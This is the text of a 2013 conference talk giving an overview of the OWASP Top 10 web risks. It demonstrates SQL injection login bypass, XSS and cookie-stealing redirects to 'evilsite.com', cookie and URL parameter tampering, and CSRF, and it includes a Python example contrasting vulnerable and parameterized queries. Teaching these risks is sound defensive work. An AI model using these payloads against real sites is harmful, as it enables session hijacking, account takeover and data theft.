16th Annual Karnataka Conference: GRC Compliance to Culture, July 19 & 20, 2013. Topic: OWASP Top 10 An Overview. Speakers: Akash Mahajan & Tamaghna Basu
OWASP Top 10 An Overview. The Open Web Application Security Project publishes web security guidance in various forms for the different stakeholders in application security. Whilst the Top 10 Web Risks and Vulnerabilities is its most followed and used document, awareness of it is still pretty low. We will give an overview of the OWASP Top 10 from a security practitioner's point of view and, using a few demonstrations, explain why you and your organization should actively follow and start using this completely free and open resource. Whether you are contemplating starting an Application Security Program or would like to validate what you are already doing, this talk and demonstration will definitely give you something to think about.
OWASP Top 10 An Overview Akash Mahajan and Tamaghna Basu
OWASP Top 10 will enable you to separate signal from the noise
Who follows OWASP Top 10?
National Institute of Standards and Technology (NIST) - USA
National Security Agency (NSA) - USA
Payment Card Industry Security Standards Council - Worldwide
Defence Information Systems Agency (DISA) - USA
European Network and Information Security Agency (ENISA) - Europe
Other agencies like IEEE, ANSSI France, BSI Germany, Center for Internet Security USA, CPNI UK
All the juicy data is in the app layer now
Vulnerability + Threat = Risk
Untrusted Input: Attack In & Data Out
Untrusted Input
A1 - Injection
A1 - SQL Injection Normal Login
A1 - SQL Injection Login Successful
A1 - SQL Injection Invalid Username/password
A1 - SQL Injection Type admin
A1 - SQL Injection DB error: You have an error in SQL syntax
A1 - SQL Injection: SQL statement in error details: SELECT * FROM accounts WHERE username = 'admin' AND password= 'admin'
A1 - SQL Injection
What we got: SELECT * FROM accounts WHERE username = 'admin' AND password= 'admin'
SQL statement to bypass validation: SELECT * FROM accounts WHERE username = 'admin' or '1' = '1' AND password= 'admin' or '1' = '1'
Attack vector: admin' or '1' = '1
A1 - SQL Injection admin or 1 = 1
A1 - SQL Injection Login bypass
A1 - SQL Injection Data extraction
A1 - SQL Injection
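The login query from the A1 slides, rebuilt as an added example (not code from the talk) against an in-memory SQLite database: the concatenated query accepts the slides' `admin' or '1' = '1` input and throws a DB error on a stray quote, while the same query written with placeholders treats both inputs as plain strings. The `accounts` table contents, the credentials and the function names are constructed for this demo.

```python
import sqlite3


def make_db():
    """Constructed sample database: one accounts table, one valid user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("INSERT INTO accounts VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable: input is pasted into the SQL text, exactly as the
    query in the error details on the slides was assembled."""
    sql = ("SELECT * FROM accounts WHERE username = '" + username +
           "' AND password= '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Hardened: bound parameters keep the input as data, so a quote or
    an 'or 1 = 1' fragment can never change the query structure."""
    sql = "SELECT * FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def causes_db_error(conn, username, password):
    """True if the vulnerable login raises a SQL error for this input,
    the symptom shown on the 'DB error: You have an error in SQL
    syntax' slide when a lone quote is typed into the username field."""
    try:
        login_vulnerable(conn, username, password)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1' = '1"          # attack vector from the slides
    print("vulnerable, payload:", login_vulnerable(db, payload, payload))
    print("safe, payload:      ", login_safe(db, payload, payload))
    print("stray quote errors: ", causes_db_error(db, "admin'", "admin"))
    print("safe, stray quote:  ", login_safe(db, "admin'", "admin"))
```

Watching for the error case in application logs is the defender's cheapest detection: a login page that returns raw SQL syntax errors is leaking the query shape the bypass needs.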
A3 - Cross Site Scripting / XSS
A3 - XSS
A3 - XSS: User input is reflected back to the page
A3 - XSS - <script>alert(1)</script>
A3 XSS Script got executed
A3 - XSS - <script>alert(document.cookie)</script>
A3 - XSS Got the cookie
A3 - XSS - What is next? Session Hijacking
<script>window.location="http://www.evilsite.com?cookie="+document.cookie;</script>
http://www.evilsite.com/?cookie=showhints=0;%20username=ed;%20uid=1;%20PHPSESSID=fggru3irrkl@ff6js91uida24
Authentication Do I really know you?
On the internet nobody knows you are a dog
A2 - Broken Authentication & Session Management
A2 Login with username ed
A2 Logged in as ed
A2 View Cookie name: uid, value: 16
A2 Change the value: 1
A2 Reload the page, user changed to admin
I am not sure if you are allowed to do that.
A4 - Insecure Direct Object Reference
A4 - Accessing another person's account
https://www.onlinebank.com/user?acct=6065
Attacker notices his acct parameter is 6065: ?acct=6065
He modifies it to a nearby number: ?acct=6066
Attacker views the victim's account information
A7 - Missing function level access control
Failure to Restrict URL Access Illustrated
Attacker notices the URL indicates his role: /user/getaccounts
He modifies it to another directory (role): /admin/getaccounts, or /manager/getaccounts
Attacker views more accounts than just their own
A8 - Cross Site Request Forgery
CSRF? The attacker sends the victim a fake link with some fancy offer; the victim, who has an active connection to the web application, sends a request with his cookie without his knowledge.
Security Mistakes: It's funny when it happens to others
You ran the web server as root with 777 for uploads!
A5 - Security Misconfigurations
Network Solutions' shared WordPress hosting:
rwxrwxrwx 1 root root 0 2010-11-23 08:21 wp-config.php
A6 Sensitive Data Exposure
A9 Using components with known vulnerabilities
Recap
Untrusted Inputs: A1 - Injection; A3 - Cross Site Scripting
Authentication / Authorization: A2 - Broken Authentication & Session Management; A4 - Insecure Direct Object Reference; A7 - Missing function level access control; A8 - Cross Site Request Forgery
Security Mistakes: A5 - Security Misconfiguration; A6 - Sensitive Data Exposure; A9 - Using vulnerable components
Conclusions: Use OWASP and write secure apps
akashmahajan@gmail.com tamaghna.basu@gmail.com Do you have any questions?